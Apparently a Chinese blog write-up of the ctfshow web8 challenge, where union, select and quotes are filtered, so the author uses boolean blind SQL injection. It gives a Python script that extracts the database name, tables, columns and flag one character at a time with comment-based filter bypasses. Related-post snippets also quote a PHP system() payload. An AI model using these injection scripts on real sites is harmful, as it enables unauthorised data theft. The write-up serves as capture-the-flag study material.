ctfshow web8 盲注来了!

最新推荐文章于 2024-10-01 14:04:29 发布
最新推荐文章于 2024-10-01 14:04:29 发布
阅读量202 收藏
点赞数 3
文章标签: oracle 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46915877/article/details/138680867
版权

先来看到web7,一个文章浏览页面。点击一个看看

观察url,有get的注入点

简简单单,后面不用我教了吧?(注意,id要负数,不然不显示后面的)

再来看到今天的主角:前面类似,但是会发现一个问题

union\select\单引号等等都被过滤了。所以我们处于无回显或者说只有布尔回显的状态。

那就采用布尔注入,先判断数据库长度。试到4发现有回显。那我们就如法炮制。

当然,也可以写脚本来执行

import requests

url = 'http://53aab0c2-b451-4910-a1e0-f15fd9e64b2a.challenge.ctf.show:8080/index.php?id=-1/**/or/**/'
name = ''

# 循环45次( 循环次数按照返回的字符串长度自定义)
for i in range(1, 45):
    # 获取当前使用的数据库
    # payload = 'ascii(substr(database()from/**/%d/**/for/**/1))=%d'
    # 获取当前数据库的所有表
    # payload = 'ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())from/**/%d/**/for/**/1))=%d'
    # 获取flag表的字段
    # payload = 'ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x666C6167)from/**/%d/**/for/**/1))=%d'
    # 获取flag表的数据
    payload = 'ascii(substr((select/**/flag/**/from/**/flag)from/**/%d/**/for/**/1))=%d'
    count = 0
    print('正在获取第 %d 个字符' % i)
    # 截取SQL查询结果的每个字符, 并判断字符内容
    for j in range(31, 128):
        result = requests.get(url + payload % (i, j))

        if 'If' in result.text:
            name += chr(j)
            print('数据库名/表名/字段名/数据: %s' % name)
            break

        # 如果某个字符不存在,则停止程序
        count += 1
        if count >= (128 - 31):
            exit()

兔白(Too Bad)
关注
ctfshow web214 时间盲注标准脚本
10-21
ctfshow web214 时间盲注标准脚本
ctfshow web220 盲注left,limit控制脚本(绕substr\ascii\mid)
10-21
ctfshow web220 盲注left,limit控制脚本(绕substr\ascii\mid)
CTF_webshow_web8盲注脚本
weixin_54227009的博客
05-14 344
直接大佬脚本开始嗦: import requests url = 'http://438302a7-56ba-4098-ad0a-0f245da447b0.challenge.ctf.show/index.php?id=-1/**/or/**/' name = '' # 循环45次( 循环次数按照返回的字符串长度自定义) for i in range(1, 45): # 获取当前使用的数据库 # payload = 'ascii(substr(database()from/**/%d
[SQL盲注]CTFSHOW------WEB7(二分法快速爆出数据)
Y4tacker的博客
08-05 6076
这道题是盲注,至于是为什么可以看其他师傅的,我不想多说,只是想记录下我的脚本而已 我的payload分别是查数据库、数据表、列名和爆字段,自己取消注释玩, 然后url前半部分改成你的靶机的url import requests url = "http://ef1aa69c-3250-414b-9468-0c03efbfbd6f.chall.ctf.show/?id='/**/" result = '' i = 0 while True: i = i + 1 head = 32
ctfshow web(日志注入&简单回显盲注&&with rollup注入绕过)
weixin_63231007的博客
05-25 1094
web3 <?php include($_GET['url']);?> php伪协议的标志。没有提示我们flag在哪个文件,filter试一下flag.php,flag,txt,flag都没有 用php://input试一下,burp抓包 发现了ctf_go_go_go,应该就是我们的flag文件。 post 传入 <?php system('cat ctf_go_go_go'); ?> cat一下,得到flag。 web4 include()函数包含的文件会被
[CTFSHOW]SQL注入(WEB入门)
热门推荐
Y4tacker的博客
11-25 1万+
文章目录前言新手区web171web172web173web174 前言 看大家好像挺需要的所以在这里记录一下自己的脚本和payload,不做思路讲解,除非题目比较骚 新手区 可以看看我以前记录的小笔记 SQL注入之MySQL注入的学习笔记(一) SQL注入之MySQL注入学习笔记(二) web171 比较常规的题目不做讲解了,这里给出payload # 查数据库 payload = "-1'union select 1,2,group_concat(table_name) from information
CTFSHOW WEB入门——sql注入
Chur的博客
07-22 4749
ctfshow 靶场 web入门 sql注入系列
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
CTFSHOW web193 left标注盲注脚本
05-04
这段代码是一个用于获取某个网站的 flag 的脚本。它使用了 SQL 注入漏洞来获取 flag。具体来说,它通过构造 SQL 语句的方式,逐个字符地获取 flag。其中,它通过修改注入语句中的 payload 变量,来获取不同的信息,...
CTFSHOW web192 标注盲注脚本
05-04
此脚本尝试通过 SQL 注入获取一个网站的 flag,实现过程是构造不同的 SQL 注入 payload 并发送 POST 请求,如果返回的响应中包含特定字符串,则说明获取到了一个字符,将其添加到 flag 中,最终输出完整的 flag。...
CTFshow-WEB入门-SQL注入(下)
feng的博客
02-11 2090
web227 按照上一题的方法,发现查不出flag表了,把ctfshow_user表给爆了一下也没flag,然后写一句话马,蚁剑连上去还是找不到flag,人傻了。。。 看了一下y4师傅的WP,原来这题考的是存储过程: 存储过程(Stored Procedure)是一种在数据库中存储复杂程序,以便外部程序调用的一种数据库对象。 存储过程是为了完成特定功能的SQL语句集,经编译创建并保存在数据库中,用户可通过指定存储过程的名字并给定参数(需要时)来调用执行。 存储过程思想上很简单,就是数据库 SQL 语言层面
CTFshow之web171~180---SQL注入(1)
金 帛的博客
06-04 2465
ctfshow,SQL注入的wp
[代码审计][备份泄露][时间盲注]CTFSHOW----WEB15(不会做以后补充)
Y4tacker的博客
08-06 7247
文章目录备份文件代码审计 备份文件 首先题目hint里面说了是源码泄露,我自己随便输入也发现了www.zip,但是还是走流程吧,用dirsearch工具,从这里我们也能发现突破口 代码审计 首先这是它给的压缩包,从里面我看了一下发现关键文件2020.php 发现是基于X-Forwarded-For,也就是XFF头的注入 <?php require_once './include/common.php'; $realip = real_ip(); $ipcount = $DB->count("
两种CTF中特殊盲注的总结
蚁景网安学院
02-04 954
知识点实操概要MySQL注入中,3种盲注方式:基于布尔的盲注、基于时间的盲注、基于报错的盲注。以此掌握盲注原理!链接指路:https://www.hetianlab.com/expc.do...
CTFSHOW sql注入(一)
qq_51754713的博客
10-04 4906
title: CTFSHOW-sql注入(一) data: 2021-09-15 tags: CTF-web CTFSHOW sql注入(一) 开始一周的高强度sql注入训练,先从ctfshow 的基础开始。 包含了CTFSHOW sql注入的 170-200题。 这里都是sql注入的一些基本知识点。主要是了解sql注入的常见题型。 题目 web 171(万能密码) 万能密码: 1'or 1=1-- - web 172(过滤回显内容) 这里看出有一定的waf,我们并不能在username里面.
ctfshow-sql注入-超详解(172-200)
qq_50589021的博客
08-05 2733
前言 今天是2021/7/25,正式进入sql注入专题,目标:加强python的学习,达到通过写python脚本,加快注入速度的程度,掌握sql在php编程中的一系列查询语句。 新手区 可以看看Y4师傅以前记录的小笔记 SQL注入之MySQL注入的学习笔记(一) SQL注入之MySQL注入学习笔记(二) 2021-7-25 web172、web173——hex() 、to_base64() 查询语句 //拼接sql语句查找指定ID用户 $sql = "select username,password fro
sql盲注脚本编写
lyy0xfff的博客
08-01 1040
因为下学期要学python,又因为自己的python和编程能力实在是太弱了,所以想来学学python脚本编写的应用,就以sqli-labs里面的布尔盲注、时间盲注作为例子,来一步一步学习编写脚本 Requests库 写脚本注入的时候,用的最多的库就是requests库了,顺便学习一下它8!它可以在python中发出一个标准的HTTP请求。可以基本完全满足HTTP测试需求 安装库 pip install requests 导入库 import requests 请求(Request) params: u
滚雪球学MySQL[7.3讲]:数据库日志与审计详解:从错误日志到审计日志的配置与使用
最新发布
**My Coding Family**
10-01 1450
在上一期中,我们深入探讨了数据库的安全策略,特别是如何通过权限管理、加密和用户认证来保护数据库免受未授权的访问。然而,尽管这些预防性措施非常重要,但仅靠安全策略并不能完全规避数据库运行中的潜在问题和安全隐患。要确保数据库的长期稳定、安全运行,日志与审计成为不可或缺的工具。通过对数据库活动进行记录和审查,管理员可以及时发现并解决系统中的故障和异常行为。本期文章将深入探讨日志与审计,具体涵盖日志的类型及配置(如错误日志、慢查询日志)以及审计日志的使用与配置。
SpringBoot之Profile的两种使用方式
shg的博客
09-30 1024
通常项目开发过程中,会经历多种环境转换,典型的如开发环境(dev)、测试环境(test)和生产环境(prod)。在这三种不同的环境下,连接数据库时使用的配置信息是不同的,即三个不同环境对应三个不同的数据库。 现在的需求是:当在不同的环境下,想通过修改配置文件来连接不同的数据库。比如在开发过程中启动项目时,想连接开发环境对应的数据库,可以在配置文件中指定 environment = dev。其他环境类似,此时就需要用到Spring为我们提供的Profile功能。
ctfshow 盲注
09-27
ctfshow 盲注是一种常见的网络安全漏洞,可以通过构造恶意注入语句来绕过身份验证或者获取敏感信息。在提供的引用中,我们可以看到三个示例注入语句。可以看出这些语句都是采用了联合查询来获取敏感信息,其中包括...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值